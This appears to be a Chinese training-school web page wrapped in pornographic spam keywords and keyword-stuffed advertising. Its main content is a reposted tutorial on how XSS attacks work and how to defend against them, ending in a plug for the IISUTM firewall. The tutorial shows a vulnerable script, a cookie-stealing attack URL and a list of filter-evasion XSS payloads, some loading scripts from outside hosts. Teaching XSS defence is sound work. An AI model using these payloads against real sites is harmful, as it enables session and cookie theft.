日韩群交,国产精品亚洲一区二区z,99香蕉国产精品偷在线观看,97精品免费视频

手機(jī)網(wǎng)站 網(wǎng)站地圖 城市 綜合 文章 資訊 裝修 plc 焊工 電工 焊工 湖南長(zhǎng)沙陽(yáng)光電腦維修培訓(xùn)學(xué)校是一家以電腦維修技術(shù)為核心的電腦維修培訓(xùn)學(xué)校,主營(yíng)湖南電腦維修培訓(xùn),長(zhǎng)沙電腦維修培訓(xùn)。學(xué)校的主要課程有電腦維修培訓(xùn),電腦維修培訓(xùn),電腦維修培訓(xùn),歡迎全國(guó)各地學(xué)員來(lái)我校學(xué)習(xí)電腦維修技術(shù)。學(xué)校常年開設(shè):電腦維修培訓(xùn),電腦維修培訓(xùn),電腦維修培訓(xùn),電腦維修入門,線下電腦維修培訓(xùn),電腦維修學(xué)習(xí),電腦維修培訓(xùn),電腦維修培訓(xùn),機(jī)器人培訓(xùn)。提供電腦維修學(xué)員 關(guān)心的問(wèn)題:電腦維修培訓(xùn),電腦維修培訓(xùn)機(jī)構(gòu),一般電腦維修培訓(xùn)要多少錢,電腦維修專業(yè)培訓(xùn)機(jī)構(gòu),電腦維修培訓(xùn),電腦維修基礎(chǔ)培訓(xùn),專業(yè)電腦維修培訓(xùn),電腦維修培訓(xùn)學(xué)校哪個(gè)好,電腦維修培訓(xùn)大概多少錢,電腦維修培訓(xùn)學(xué)校,學(xué)習(xí)電腦維修培訓(xùn),電腦維修培訓(xùn)班大概多長(zhǎng)時(shí)間,電腦維修培訓(xùn),電腦維修入門培訓(xùn),電腦維修零基礎(chǔ)自學(xué)入門,電腦維修培訓(xùn)班有用嗎,電腦維修培訓(xùn)多少錢,電腦維修培訓(xùn)要多少錢,招生地區(qū):中山,固原,銀川,玉樹,海東,隴南,酒泉,張掖,天水,金昌,蘭州,榆林,延安,渭南,銅川,阿里,山南,拉薩,怒江,文山州,楚雄州,普洱,昭通,玉溪,昆明,畢節(jié),銅仁,遵義,貴陽(yáng),甘孜州,資陽(yáng),達(dá)州,宜賓,南充,遂寧,綿陽(yáng),瀘州,自貢,三亞,崇左,河池,玉林,欽州,梧州,柳州,梅州,肇慶,湛江,佛山,珠海,韶關(guān),湘西州,懷化,郴州,張家界,邵陽(yáng),株洲,仙桃,隨州,荊州,荊門,襄樊,黃石,駐馬店,信陽(yáng),南陽(yáng),漯河,中衛(wèi),石嘴山,海西,海南藏州,黃南州,海北,甘南,慶陽(yáng),平?jīng)?武威,白銀,嘉峪關(guān),安康,漢中,咸陽(yáng),寶雞,林芝,日喀則,昌都,迪慶,德宏,大理,西雙版納,紅河州,臨滄,麗江,保山,曲靖,黔東州,黔西州,安順,六盤水,涼山州,阿壩州,雅安,廣安,眉山,內(nèi)江,廣元,德陽(yáng),攀枝花,成都,?,來(lái)賓,百色,貴港,北海,桂林,南寧,云浮,揭陽(yáng),潮州,清遠(yuǎn),陽(yáng)江,汕尾,惠州,茂名,江門,汕頭,深圳,廣州,婁底,永州,益陽(yáng),岳陽(yáng),湘潭,長(zhǎng)沙,恩施州,黃岡,孝感,鄂州,十堰,武漢,周口,商丘,三門峽,許昌,焦作,安陽(yáng),鶴壁,平頂山,開封,鄭州,聊城,濱州,德州,萊蕪,日照,泰安,煙臺(tái),濰坊,東營(yíng),淄博,上饒,濟(jì)南,撫州,宜春,贛州,新余,九江,景德鎮(zhèn),寧德,南平,泉州,莆田,廈門,宣城,亳州,六安,宿州,黃山,滁州,安慶,淮北,馬鞍山,蚌埠,蕪湖,合肥,麗水,舟山,衢州,金華,湖州,嘉興,寧波,宿遷,鎮(zhèn)江,鹽城,連云港,蘇州,徐州,南京,綏化,牡丹江,佳木斯,大慶,鶴崗,哈爾濱,白城,白山,遼源,吉林,葫蘆島,鐵嶺,盤錦,阜新,錦州,本溪,鞍山,沈陽(yáng),錫林郭勒盟,通遼,烏海,呂梁,忻州,晉中,晉城,陽(yáng)泉,太原,廊坊,承德,保定,邯鄲,唐山,寧夏,甘肅,西藏,貴州,重慶,廣西,湖南,河南,江西,安徽,江蘇,黑龍江,遼寧,山西,天津,四平,內(nèi)蒙古,吳忠,果洛,西寧,定西,商洛,西安,那曲,黔南州,巴中,樂(lè)山,賀州,防城港,東莞,河源,常德,衡陽(yáng),咸寧,宜昌,濮陽(yáng),新鄉(xiāng),洛陽(yáng),菏澤,臨沂,威海,濟(jì)寧,棗莊,青島,吉安,鷹潭,萍鄉(xiāng),南昌,龍巖,漳州,三明,福州,池州,巢湖,阜陽(yáng),銅陵,淮南,臺(tái)州,紹興,溫州,杭州,泰州,揚(yáng)州,淮安,南通,常州,無(wú)錫,大興安嶺,黑河,七臺(tái)河,伊春,雙鴨山,雞西,齊齊哈爾,延邊,松原,通化,長(zhǎng)春,朝陽(yáng),遼陽(yáng),營(yíng)口,丹東,撫順,大連,阿拉善盟,興安盟,烏蘭察布,巴彥淖爾,呼倫貝爾,鄂爾多斯,赤峰,包頭,呼和浩特,臨汾,運(yùn)城,朔州,長(zhǎng)治,大同,衡水,滄州,張家口,邢臺(tái),秦皇島,石家莊,青海,陜西,云南,四川,海南,廣東,湖北,山東,福建,浙江,上海,吉林,河北,北京
陽(yáng)光PLC編程培訓(xùn)學(xué)校形象圖片
湖南陽(yáng)光PLC編程培訓(xùn)學(xué)校
畢業(yè)學(xué)員的真情感言
  • 新報(bào)名學(xué)員名單(實(shí)時(shí)滾動(dòng))
    新就業(yè)創(chuàng)業(yè)學(xué)員名單
    WEB安全防范XSS跨站式腳本攻擊
    WEB安全防范XSS跨站式腳本攻擊
    當(dāng)前位置: > 網(wǎng)絡(luò)技術(shù)更新時(shí)間:2021-10-16 21:55:45主題:WEB安全防范XSS跨站式腳本攻擊 圍觀:

    原文:www.iisutm.com

    網(wǎng)站要怎么防范常見的XSS跨站式腳本攻擊呢,我們先從XSS跨站式腳本攻擊的原理來(lái)說(shuō)起。

    網(wǎng)站遭受XSS跨站式腳本攻擊的基本原理

    1.本地利用漏洞,這種漏洞存在于頁(yè)面中客戶端腳本自身。

    其攻擊過(guò)程如下所示:

    A給B發(fā)送一個(gè)惡意構(gòu)造了Web的URL。

    B點(diǎn)擊并查看了這個(gè)URL。

    惡意頁(yè)面中的JavaScript打開一個(gè)具有漏洞的HTML頁(yè)面并將其安裝在B電腦上。

    具有漏洞的HTML頁(yè)面包含了在B電腦本地域執(zhí)行的JavaScript。

    A的惡意腳本可以在B的電腦上執(zhí)行B所持有的權(quán)限下的命令。

    2反射式漏洞,這種漏洞和本地利用漏洞有些類似,不同的是Web客戶端使用Server端腳本生成頁(yè)面為用戶提供數(shù)據(jù)時(shí),如果未經(jīng)驗(yàn)證的用戶數(shù)據(jù)被包含在頁(yè)面中而未經(jīng)HTML實(shí)體編碼,客戶端代碼便能夠注入到動(dòng)態(tài)頁(yè)面中。

    其攻擊過(guò)程如下:

    A經(jīng)常瀏覽某個(gè)網(wǎng)站,此網(wǎng)站為B所擁有。B的站點(diǎn)運(yùn)行A使用用戶名/密碼進(jìn)行登錄,并存儲(chǔ)敏感信息(比如銀行帳戶信息)。

    C發(fā)現(xiàn)B的站點(diǎn)包含反射性的XSS漏洞。

    C編寫一個(gè)利用漏洞的URL,并將其冒充為來(lái)自B的郵件發(fā)送給A。

    A在登錄到B的站點(diǎn)后,瀏覽C提供的URL。

    嵌入到URL中的惡意腳本在A的瀏覽器中執(zhí)行,就像它直接來(lái)自B的服務(wù)器一樣。此腳本盜竊敏感信息(授權(quán)、信用卡、帳號(hào)信息等)然后在A完全不知情的情況下將這些信息發(fā)送到C的Web站點(diǎn)。

    3存儲(chǔ)式漏洞,該類型是應(yīng)用 為廣泛而且有可能影響到Web服務(wù)器自身安全的漏洞,駭客將攻擊腳本上傳到Web服務(wù)器上,使得所有訪問(wèn)該頁(yè)面的用戶都面臨信息泄漏的可能,其中也包括了Web服務(wù)器的管理員。

    其攻擊過(guò)程如下:

    B擁有一個(gè)Web站點(diǎn),該站點(diǎn)允許用戶發(fā)布信息/瀏覽已發(fā)布的信息。

    C注意到B的站點(diǎn)具有存儲(chǔ)式的XXS漏洞。

    C發(fā)布一個(gè)熱點(diǎn)信息,吸引其它用戶紛紛閱讀。

    B或者是任何的其他人如A瀏覽該信息,其會(huì)話cookies或者其它信息將被C盜走。

    類型A直接威脅用戶個(gè)體,而類型B和存儲(chǔ)式漏洞所威脅的對(duì)象都是企業(yè)級(jí)Web應(yīng)用。

    網(wǎng)站遭受XSS跨站式腳本攻擊的基本方式

    1. DOM-based cross-site scripting

    頁(yè)面本身包含一些DOM對(duì)象的操作,如果未對(duì)輸入的參數(shù)進(jìn)行處理,可能會(huì)導(dǎo)致執(zhí)行惡意腳本。如下面一些DOM操作:

    document.URL

    document.URLUnencoded

    document.location (and many of its properties)

    document.referrer

    window.location (and many of its properties)


    舉個(gè)例子,假如某個(gè)脆弱的頁(yè)面的代碼如下:

    <HTML>

    <TITLE>Welcome!</TITLE>

    Hi

    <SCRIPT>

    var pos=document.URL.indexOf("name=")+5;

    document.write(document.URL.substring(pos,document.URL.length));

    </SCRIPT>

    <BR>

    Welcome to our system

    </HTML>

    攻擊者使用如下的URL訪問(wèn)時(shí),則非常危險(xiǎn):

    http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

    試了一下,貌似IE、FireFox等瀏覽器默認(rèn) 對(duì)<script>alert(document.cookie)</script>進(jìn)行了編碼,阻止了腳本的執(zhí)行。但是對(duì)于 DOM操作還是要更加謹(jǐn)慎啊,比如把上面的頁(yè)面修改一下,安全性就增強(qiáng)了不少:

    <SCRIPT>

    var pos=document.URL.indexOf("name=")+5;

    var name=document.URL.substring(pos,document.URL.length);

    if (name.match(/^[a-zA-Z0-9]$/))

    {

    document.write(name);

    }

    else

    {

    window.alert("Security error");

    }

    </SCRIPT>

    2. Reflected cross-site scripting

    也被稱為None-Persistent cross-site scripting,即,非持久化的XSS攻擊,是我們通常所說(shuō)的,也是 常用,使用 廣的一種方式。它通過(guò)給別人發(fā)送帶有惡意腳本代碼參數(shù)的URL,當(dāng) URL地址被打開時(shí),特有的惡意代碼參數(shù)被HTML解析、執(zhí)行。它的特點(diǎn)是非持久化,必須用戶點(diǎn)擊帶有特定參數(shù)的鏈接菜能引起。

    3. Persistent cross-site scripting

    持久化XSS攻擊,指的是惡意腳本代碼被存儲(chǔ)進(jìn)被攻擊的數(shù)據(jù)庫(kù),當(dāng)其他用戶正常瀏覽網(wǎng)頁(yè)時(shí),站點(diǎn)從數(shù)據(jù)庫(kù)中讀取了非法用戶存入非法數(shù)據(jù),惡意腳本代碼被執(zhí)行。這種攻擊類型通常在留言板等地方出現(xiàn)。

    實(shí)施方式

    我們來(lái)試一把Reflected cross-site scripting。當(dāng)我們?cè)谀尘W(wǎng)站輸入?yún)?shù)XXX,發(fā)現(xiàn)參數(shù)XXX原樣的出現(xiàn)在了頁(yè)面源碼中:

    <input type="text" class="Seach" name="w" value="XXX" />
    OK,可以開始做文章了,我們將XXX替換為:abc"/><script>alert('haha')</script><a href=",返回的HTML代碼如下:

    <input type="text" class="Seach" name="w" value="abc"/>
    <script>alert('haha')</script><!--" />
    這樣,<script>alert('haha')</script>被執(zhí)行了。這里再舉例一些XSS攻擊行為:

    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
    <IMG SRC="jav ascript:alert('XSS');">
    <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    <<SCRIPT>alert("XSS");//<</SCRIPT>
    <iframe src=http://example.com/scriptlet.html <
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    <BODY BACKGROUND="javascript:alert('XSS')">
    <BODY ONLOAD=alert(document.cookie)>
    <BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert("XSS")>
    <IMG DYNSRC="javascript:alert('XSS')">
    <IMG DYNSRC="javascript:alert('XSS')">
    <BR SIZE="&{alert('XSS')}">
    <IMG SRC='vbscript:msgbox("XSS")'>
    <TABLE BACKGROUND="javascript:alert('XSS')">
    <DIV STYLE="width: expression(alert('XSS'));">
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
    <A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
    <IMG SRC=javascript:alert('XSS')>
    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
    a="get"
    b="URL("""
    c="javascript:"
    d="alert('XSS');"")"
    eval(a+b+c+d);
    總結(jié)一下,要防止XSS跨站式腳本攻擊主要是要在查詢字符串(QueryString),表單數(shù)據(jù)(PostData)以及Cookie甚至HTTP報(bào)頭(Header)中防止掉一些javascript關(guān)鍵字和一些敏感的字符(單引號(hào),分號(hào))以及SQL語(yǔ)言的關(guān)鍵字,以及防止他們使用encode編碼。

    用ASP或者PHP腳本來(lái)實(shí)現(xiàn)上面的這些想起來(lái)就很麻煩。下面就來(lái)介紹下用一個(gè)第三方工具IISUTM來(lái)處理上面我們說(shuō)到的問(wèn)題。

    準(zhǔn)備工作:先去www.iisutm.com下載 新的IISUTM版本。

    根據(jù)IISUTM網(wǎng)站防火墻安裝及操作手冊(cè) 中的說(shuō)明把IISUTM部署到你的服務(wù)器上來(lái),這里需要注意的是使用Windows 2003+iis6的服務(wù)器,需要開啟iis中“以IIS5.0 隔離模式運(yùn)行 www 服務(wù)選項(xiàng)才能正常使用該軟件。

    安裝完成,通過(guò)瀏覽器訪問(wèn)IISUTM的配置管理界面默認(rèn)的是http://127.0.0.1:8362,這個(gè)是私有地址,只能在該服務(wù)器上訪問(wèn),你需要任何地方都能訪問(wèn)的話,可以在安裝的時(shí)候IP地址的選項(xiàng)那里填入你服務(wù)器的公網(wǎng)IP地址,和你所開放的端口。這樣你就可以通過(guò)你配置的地址進(jìn)行訪問(wèn),或者你可以在iis中直接管理名為IISUTM的站點(diǎn)。

    登陸管理界面后點(diǎn)擊上面導(dǎo)航欄中的“基本設(shè)置,然后點(diǎn)擊左邊菜單的“防XSS攻擊鏈接。

    開啟該鏈接里所有的選項(xiàng),選中之后IISUTM會(huì)自動(dòng)保存配置,下面的“使用不允許的發(fā)送序列是該軟件提供的XSS攻擊關(guān)鍵字的特征庫(kù),你可以根據(jù)你網(wǎng)站的情況進(jìn)行更改( 好不要修改)。

    確認(rèn)以上的配置以后,你可以返回到IISUTM管理界面的首頁(yè),這里會(huì)列出 近服務(wù)器遭受到的攻擊以及詳細(xì),趕緊去看看你的網(wǎng)站是不是隨時(shí)有人在進(jìn)行SQL注入吧,以及哪些攻擊被IISUTM處理掉了。

    標(biāo)簽:


    溫馨提示:湖南陽(yáng)光技術(shù)學(xué)校常年面向全國(guó)招生(不限年齡)。由湖南陽(yáng)光技術(shù)學(xué)校實(shí)戰(zhàn)一線首席技術(shù)專家授課,天天實(shí)操,全程實(shí)戰(zhàn),手把手教,。我們是正規(guī)技術(shù)學(xué)校,我們有自己的校園,我們是行業(yè)正規(guī)軍!我們有自己的教學(xué)樓、學(xué)員公寓樓、籃球場(chǎng)(2個(gè))、有校內(nèi)花園、有專業(yè)實(shí)操車間。我們會(huì)為您提供海量的WEB安全防范XSS跨站式腳本攻擊的信息,如果您想了解有關(guān)WEB安全防范XSS跨站式腳本攻擊方面的更多資訊,請(qǐng)經(jīng)常關(guān)注我校網(wǎng)站: 也可以加我們微信號(hào):yp941688 或 yp94168;我們將給你 詳細(xì)的與WEB安全防范XSS跨站式腳本攻擊相關(guān)的解答。 如果您對(duì)湖南陽(yáng)光技術(shù)學(xué)校發(fā)布的WEB安全防范XSS跨站式腳本攻擊這條信息有什么好的建議,請(qǐng)告訴我們。您的寶貴建議對(duì)我們逐步完善WEB安全防范XSS跨站式腳本攻擊的內(nèi)容有重要的參考作用!

      隨機(jī)文章


      安防監(jiān)控技術(shù)學(xué)校
      安防監(jiān)控技術(shù)學(xué)校
      安防監(jiān)控技術(shù)學(xué)校
      返回頂部